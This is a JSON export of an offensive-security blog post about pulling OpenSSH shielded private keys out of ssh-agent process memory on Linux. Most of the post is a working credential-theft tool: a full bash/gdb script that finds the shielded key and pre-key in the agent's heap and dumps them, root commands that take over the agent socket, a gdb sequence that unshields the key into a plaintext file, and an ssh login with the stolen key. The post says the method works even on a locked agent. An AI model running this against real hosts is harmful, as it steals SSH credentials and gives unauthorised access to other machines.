{"id":313,"date":"2021-07-23T10:50:40","date_gmt":"2021-07-23T08:50:40","guid":{"rendered":"https:\/\/security.humanativaspa.it\/?p=313"},"modified":"2025-09-15T13:22:50","modified_gmt":"2025-09-15T13:22:50","slug":"openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux","status":"publish","type":"post","link":"https:\/\/hnsecurity.it\/it\/blog\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\/","title":{"rendered":"OpenSSH ssh-agent Shielded Private Key Extraction (x86_64 Linux)"},"content":{"rendered":"

This is just a quick blog post of some notes I thought I’d share.<\/span><\/p>\n

While most of you guys were furiously grep-ing <\/span>TermService<\/span><\/a> memory for clear-text passwords \ud83d\ude42\u00a0 I found myself searching for plain-text private keys in a ssh-agent<\/strong> process memory on a Linux box. Last time I did something similar was definitely before June 2019, when <\/span>Shielded Private Keys<\/span><\/a> were introduced in OpenSSH, therefore the tools I have available don’t work anymore. <\/span><\/span><\/p>\n

Shielded Private Keys<\/strong> were introduced in order to prevent Spectre\/Meltdown attacks against ssh keys held in memory by ssh-agent. Basically when you ssh-add a key to ssh-agent, the key is encrypted (shielded) with a symmetric key derived from a random 16KB pre_key. <\/span><\/p>\n

Identities managed by ssh-agent are represented by a (list of) Identity struct which contains a reference to the key comment and a pointer to the associated key; the new shielded key and its pre_key are both referenced within this sshkey struct by the shielded_private<\/strong> and shield_prekey<\/strong> pointers.<\/span><\/p>\n

\"\"<\/p>\n

So if we look in the heap for XREFs to the address of the key comment we should be able to find the sshkey struct; also knowing its last field is always set to 0x4000 (16KB) which is the fixed shield_prekey_len helps in identifying the sshkey struct.<\/span><\/p>\n

To quickly prove the above, I wrote the following bash\/gdb script that dumps the private shielded key and its pre_key:<\/span><\/p>\n

#!\/bin\/bash\r\n\r\nGDB=\/usr\/bin\/gdb\r\n\r\nif [[ $# -lt 2 ]]; then\r\n        echo \"Usage: .\/script [pid] [key comment]\" >&2\r\n        exit 2\r\nfi\r\n\r\nPID=$1\r\nCOMMENT=$2\r\nCOMMENT_LEN=${#COMMENT}\r\nHEAP=$(cat \/proc\/$PID\/maps | grep heap)\r\n#echo $HEAP\r\nSTART=0x${HEAP:0:12}\r\nEND=0x${HEAP:13:12}\r\nCOMMADDR=$($GDB -p $PID -batch -ex \"find $START, $END, {char[$COMMENT_LEN]}\\\"$COMMENT\\\"\" 2>\/dev\/null | egrep ^0[xX][0-9a-fA-F]{12}$)\r\necho \"[ - ] Searching for key comment string in memory -> Here's what I found:\"\r\necho \"$COMMADDR\"\r\necho \"[ - ] Now searching for XREFs to the comment addresses we found -> looking for heap addresses\"\r\nfor i in $COMMADDR; do\r\n        TEMPF=\"\\x${i:12:2}\\x${i:10:2}\\x${i:8:2}\\x${i:6:2}\\x${i:4:2}\\x${i:2:2}\"\r\n        TEMPPTR=$($GDB -p $PID -batch -ex \"find $START, $END, {char[6]}\\\"$TEMPF\\\"\" 2>\/dev\/null | egrep ^0[xX][0-9a-fA-F]{12}$)\r\n        for j in $TEMPPTR; do\r\n        VAR2=$(($j - 0x8)) # Identity->j = char *comment; Identity->(j - 0x8) = struct sshkey *key;\r\n                VAR=$($GDB -p $PID -batch -ex \"x\/za $VAR2\" 2>\/dev\/null | egrep ^0[xX][a-f0-9A-F]{12}\\:) \r\n        VAR3=${VAR:15}\r\n        echo \"[ o ] XREF $j contains $VAR3 let's see if it is in the heap\"\r\n        if (($VAR3 > $START))\r\n        then\r\n            if (($VAR3 < $END))\r\n            then\r\n                echo \"[ + ] Found a XREF in the heap $VAR3 -> searching for a sshkey struct at this address\"\r\n                KEYPOS=$(($VAR3 + 0xa0))\r\n                KEYLEN=$($GDB -p $PID -batch -ex \"x\/d $KEYPOS\" 2>\/dev\/null | egrep ^0[xX][a-f0-9A-F]{12}\\:)\r\n                echo \"SHIELD_PRIVATE_LEN ${KEYLEN:15}\"\r\n                KEYLEN1=${KEYLEN:15}\r\n                if (($KEYLEN1 != 16384)) \r\n                then \r\n                    echo \"[ - ] Key not found -> now onto the next ptr\"\r\n                    continue\r\n                else\t\r\n                    echo \"[ + ] Found the shielded private key -> now dumping it\"\r\n                    SHPOS=$(($VAR3 + 0x88))\r\n                    SPPOS=$(($VAR3 + 0x98))\r\n                    PKEYLENPOS=$(($VAR3 + 0x90))\r\n                    SHIELDED_PRIVATE=$($GDB -p $PID -batch -ex \"x\/za $SHPOS\" 2>\/dev\/null | egrep ^0[xX][a-f0-9A-F]{12}\\:)\r\n                    SHIELDED_PREKEY=$($GDB -p $PID -batch -ex \"x\/za $SPPOS\" 2>\/dev\/null | egrep ^0[xX][a-f0-9A-F]{12}\\:)\r\n                    PKEYLEN=$($GDB -p $PID -batch -ex \"x\/za $PKEYLENPOS\"  2>\/dev\/null | egrep ^0[xX][a-f0-9A-F]{12}\\:)\r\n                    printf \"SHIELDED_PRIVATE %s\\r\\n\" ${SHIELDED_PRIVATE:15}\r\n                    printf \"SHIELDED_LENGTH %d\\r\\n\" ${PKEYLEN:15}\r\n                    printf \"SHIELD_PREKEY %s\\r\\n\" ${SHIELDED_PREKEY:15}\r\n                    printf \"SHIELD_PREKEY_LEN 16384\\r\\n\"\r\n                    exec $GDB -p $PID <<EOF\r\nset \\$fd = fopen(\"\/tmp\/shielded_private\", \"w\")\r\ncall fwrite(${SHIELDED_PRIVATE:15}, 1, ${PKEYLEN:15}, \\$fd)\r\ncall fflush(\\$fd)\r\ncall fclose(\\$fd)\r\nset \\$fd = fopen(\"\/tmp\/shield_prekey\", \"w\")\r\ncall fwrite(${SHIELDED_PREKEY:15}, 1, 16384, \\$fd)\r\ncall fflush(\\$fd)\r\ncall fclose(\\$fd)\r\ndetach\r\nquit\r\nEOF\r\n                fi\r\n            fi\r\n        fi\r\n        done\r\ndone<\/pre>\n
Run it as the root user as follows:
\n
\n# ps auxw | grep ssh-agent # find ssh-agent-pid
\n# lsof -p ssh-agent-pid | grep unix # find target-unix-socket-path
\n# export SSH_AUTH_SOCK=target-unix-socket-path
\n# ssh-add -l # find key@comment
\n# .\/ospkd.sh ssh-agent-pid key@comment
\n<\/code><\/p>\n
In action:<\/p>\n
\"\"<\/p>\n
Note: this also works if the ssh-agent is locked (ssh-add -x).<\/span><\/em><\/p>\n
To avoid messing with the process memory as my script does, since gdb is available anyway a more convenient approach is to use gcore<\/strong> to dump the process memory which we can later parse with Ghidra<\/strong>; attached below there is a very simple Ghidra script which performs the same thing on a ssh-agent gcore file.<\/p>\n
$ analyzeHeadless ~\/project.rep project -import core.2225 -scriptPath ~\/ghidra_scripts -postScript ospke.java key@comment \/tmp<\/code><\/p>\n
Now that we have the shielded private key and its pre key, how do we unshield it<\/strong>? After a couple attempts I realized that I needed only two functions and, guess what, ssh-keygen is the only binary that implements both. The two functions are sshkey_unshield_private() and sshkey_save_private() (to be invoked with a blank password). So the quickest solution I came up with was compiling ssh-keygen with symbols on my local machine:
\n
\n$ tar xvfz openssh-8.6p1.tar.gz
\n$ cd openssh-8.6p1
\n$ .\/configure --with-audit=debug
\n$ make ssh-keygen
\n$ gdb .\/ssh-keygen
\n<\/code><\/p>\n
Then pasted the following into gdb:<\/p>\n
b main\r\nb sshkey_free\r\nr\r\nset $miak = (struct sshkey *)sshkey_new(0)\r\nset $shielded_private = (unsigned char *)malloc(1392)\r\nset $shield_prekey = (unsigned char *)malloc(16384)\r\nset $fd = fopen(\"\/tmp\/shielded_private\", \"r\")\r\ncall fread($shielded_private, 1, 1392, $fd)\r\ncall fclose($fd)\r\nset $fd = fopen(\"\/tmp\/shield_prekey\", \"r\")\r\ncall fread($shield_prekey, 1, 16384, $fd)\r\ncall fclose($fd)\r\nset $miak->shielded_private=$shielded_private\r\nset $miak->shield_prekey=$shield_prekey\r\nset $miak->shielded_len=1392\r\nset $miak->shield_prekey_len=16384\r\ncall sshkey_unshield_private($miak)\r\nbt\r\nf 1\r\nx *kp\r\ncall sshkey_save_private(*kp, \"\/tmp\/plaintext_private_key\", \"\", \"comment\", 0, \"\\x00\", 0)\r\nk\r\nq<\/pre>\n
Now we can log into remote hosts using the retrieved key: <\/span><\/p>\n
$ ssh -i \/tmp\/plaintext_private_key user@host<\/code>
\n<\/span><\/p>\n
The reason why we break at sshkey_free() is because the gdb malloc’d sshkey_struct cannot be freed by sshkey_free() (I guess, lol), it would crash before saving the unshielded key. So we invoke sshkey_save_private() before the sshkey_free() is hit.<\/span><\/p>\n
Note: this procedure was tested only against RSA and DSA keys on Ubuntu 20.04.2 LTS. and Kali Linux 2021.2. It may require some tweaking to work on other platforms.<\/span><\/em><\/p>\n
Download the Ghidra script here<\/a>. Have fun!
\n<\/span><\/p>\n","protected":false},"excerpt":{"rendered":"
This is just a quick blog post of some notes I thought I’d share. While most of you guys were […]<\/p>\n","protected":false},"author":5,"featured_media":159959,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[91,88],"tags":[83,86,87,92,191],"class_list":["post-313","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-articles","category-tools","tag-ghidra","tag-penetration-test","tag-reverse-engineering","tag-openssh","tag-red-teaming"],"acf":[],"yoast_head":"\nHN Security - OpenSSH ssh-agent Shielded Private Key Extraction (x86_64 Linux) -<\/title>\n<meta name=\"description\" content=\"Some notes about retrieving an OpenSSH shielded private key from ssh-agent process memory (gcore dump)\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hnsecurity.it\/it\/blog\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"HN Security - OpenSSH ssh-agent Shielded Private Key Extraction (x86_64 Linux) -\" \/>\n<meta property=\"og:description\" content=\"Some notes about retrieving an OpenSSH shielded private key from ssh-agent process memory (gcore dump)\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hnsecurity.it\/it\/blog\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\/\" \/>\n<meta property=\"og:site_name\" content=\"HN Security\" \/>\n<meta property=\"article:published_time\" content=\"2021-07-23T08:50:40+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-09-15T13:22:50+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/SSH.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\n\t<meta property=\"og:image:height\" content=\"836\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Piergiovanni Cipolloni\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@hnsec\" \/>\n<meta name=\"twitter:site\" content=\"@hnsec\" \/>\n<meta name=\"twitter:label1\" content=\"Scritto da\" \/>\n\t<meta name=\"twitter:data1\" content=\"Piergiovanni Cipolloni\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\\\/\"},\"author\":{\"name\":\"Piergiovanni Cipolloni\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/person\\\/66375aa4f81d2c08ed543cc2f9f52f0c\"},\"headline\":\"OpenSSH ssh-agent Shielded Private Key Extraction (x86_64 Linux)\",\"datePublished\":\"2021-07-23T08:50:40+00:00\",\"dateModified\":\"2025-09-15T13:22:50+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\\\/\"},\"wordCount\":493,\"publisher\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/SSH.jpg\",\"keywords\":[\"ghidra\",\"penetration test\",\"reverse engineering\",\"OpenSSH\",\"red teaming\"],\"articleSection\":[\"Articles\",\"Tools\"],\"inLanguage\":\"it-IT\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\\\/\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\\\/\",\"name\":\"HN Security - OpenSSH ssh-agent Shielded Private Key Extraction (x86_64 Linux) -\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/SSH.jpg\",\"datePublished\":\"2021-07-23T08:50:40+00:00\",\"dateModified\":\"2025-09-15T13:22:50+00:00\",\"description\":\"Some notes about retrieving an OpenSSH shielded private key from ssh-agent process memory (gcore dump)\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\\\/#primaryimage\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/SSH.jpg\",\"contentUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/SSH.jpg\",\"width\":1600,\"height\":836,\"caption\":\"openSSH\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"OpenSSH ssh-agent Shielded Private Key Extraction (x86_64 Linux)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#website\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/\",\"name\":\"HN Security\",\"description\":\"Offensive Security Specialists\",\"publisher\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#organization\",\"name\":\"HN Security\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2026\\\/01\\\/hn-libellula.jpg\",\"contentUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2026\\\/01\\\/hn-libellula.jpg\",\"width\":696,\"height\":696,\"caption\":\"HN Security\"},\"image\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/hnsec\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/hnsecurity\\\/\",\"https:\\\/\\\/github.com\\\/hnsecurity\",\"https:\\\/\\\/infosec.exchange\\\/@hnsec\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/person\\\/66375aa4f81d2c08ed543cc2f9f52f0c\",\"name\":\"Piergiovanni Cipolloni\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/453f5e2867f1519ce59622a77ab07c410f32d8c96be6823d96a0034f08eacd53?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/453f5e2867f1519ce59622a77ab07c410f32d8c96be6823d96a0034f08eacd53?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/453f5e2867f1519ce59622a77ab07c410f32d8c96be6823d96a0034f08eacd53?s=96&d=mm&r=g\",\"caption\":\"Piergiovanni Cipolloni\"},\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/author\\\/piergiovanni-cipolloni\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"HN Security - OpenSSH ssh-agent Shielded Private Key Extraction (x86_64 Linux) -","description":"Some notes about retrieving an OpenSSH shielded private key from ssh-agent process memory (gcore dump)","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hnsecurity.it\/it\/blog\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\/","og_locale":"it_IT","og_type":"article","og_title":"HN Security - OpenSSH ssh-agent Shielded Private Key Extraction (x86_64 Linux) -","og_description":"Some notes about retrieving an OpenSSH shielded private key from ssh-agent process memory (gcore dump)","og_url":"https:\/\/hnsecurity.it\/it\/blog\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\/","og_site_name":"HN Security","article_published_time":"2021-07-23T08:50:40+00:00","article_modified_time":"2025-09-15T13:22:50+00:00","og_image":[{"width":1600,"height":836,"url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/SSH.jpg","type":"image\/jpeg"}],"author":"Piergiovanni Cipolloni","twitter_card":"summary_large_image","twitter_creator":"@hnsec","twitter_site":"@hnsec","twitter_misc":{"Scritto da":"Piergiovanni Cipolloni","Tempo di lettura stimato":"5 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/hnsecurity.it\/it\/blog\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\/#article","isPartOf":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\/"},"author":{"name":"Piergiovanni Cipolloni","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/person\/66375aa4f81d2c08ed543cc2f9f52f0c"},"headline":"OpenSSH ssh-agent Shielded Private Key Extraction (x86_64 Linux)","datePublished":"2021-07-23T08:50:40+00:00","dateModified":"2025-09-15T13:22:50+00:00","mainEntityOfPage":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\/"},"wordCount":493,"publisher":{"@id":"https:\/\/hnsecurity.it\/it\/#organization"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\/#primaryimage"},"thumbnailUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/SSH.jpg","keywords":["ghidra","penetration test","reverse engineering","OpenSSH","red teaming"],"articleSection":["Articles","Tools"],"inLanguage":"it-IT"},{"@type":"WebPage","@id":"https:\/\/hnsecurity.it\/it\/blog\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\/","url":"https:\/\/hnsecurity.it\/it\/blog\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\/","name":"HN Security - OpenSSH ssh-agent Shielded Private Key Extraction (x86_64 Linux) -","isPartOf":{"@id":"https:\/\/hnsecurity.it\/it\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\/#primaryimage"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\/#primaryimage"},"thumbnailUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/SSH.jpg","datePublished":"2021-07-23T08:50:40+00:00","dateModified":"2025-09-15T13:22:50+00:00","description":"Some notes about retrieving an OpenSSH shielded private key from ssh-agent process memory (gcore dump)","breadcrumb":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hnsecurity.it\/it\/blog\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\/"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/hnsecurity.it\/it\/blog\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\/#primaryimage","url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/SSH.jpg","contentUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/SSH.jpg","width":1600,"height":836,"caption":"openSSH"},{"@type":"BreadcrumbList","@id":"https:\/\/hnsecurity.it\/it\/blog\/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hnsecurity.it\/it\/"},{"@type":"ListItem","position":2,"name":"OpenSSH ssh-agent Shielded Private Key Extraction (x86_64 Linux)"}]},{"@type":"WebSite","@id":"https:\/\/hnsecurity.it\/it\/#website","url":"https:\/\/hnsecurity.it\/it\/","name":"HN Security","description":"Offensive Security Specialists","publisher":{"@id":"https:\/\/hnsecurity.it\/it\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hnsecurity.it\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Organization","@id":"https:\/\/hnsecurity.it\/it\/#organization","name":"HN Security","url":"https:\/\/hnsecurity.it\/it\/","logo":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/logo\/image\/","url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2026\/01\/hn-libellula.jpg","contentUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2026\/01\/hn-libellula.jpg","width":696,"height":696,"caption":"HN Security"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/hnsec","https:\/\/www.linkedin.com\/company\/hnsecurity\/","https:\/\/github.com\/hnsecurity","https:\/\/infosec.exchange\/@hnsec"]},{"@type":"Person","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/person\/66375aa4f81d2c08ed543cc2f9f52f0c","name":"Piergiovanni Cipolloni","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/secure.gravatar.com\/avatar\/453f5e2867f1519ce59622a77ab07c410f32d8c96be6823d96a0034f08eacd53?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/453f5e2867f1519ce59622a77ab07c410f32d8c96be6823d96a0034f08eacd53?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/453f5e2867f1519ce59622a77ab07c410f32d8c96be6823d96a0034f08eacd53?s=96&d=mm&r=g","caption":"Piergiovanni Cipolloni"},"url":"https:\/\/hnsecurity.it\/it\/blog\/author\/piergiovanni-cipolloni\/"}]}},"jetpack_featured_media_url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/SSH.jpg","_links":{"self":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/313","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/comments?post=313"}],"version-history":[{"count":1,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/313\/revisions"}],"predecessor-version":[{"id":159975,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/313\/revisions\/159975"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/media\/159959"}],"wp:attachment":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/media?parent=313"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/categories?post=313"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/tags?post=313"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}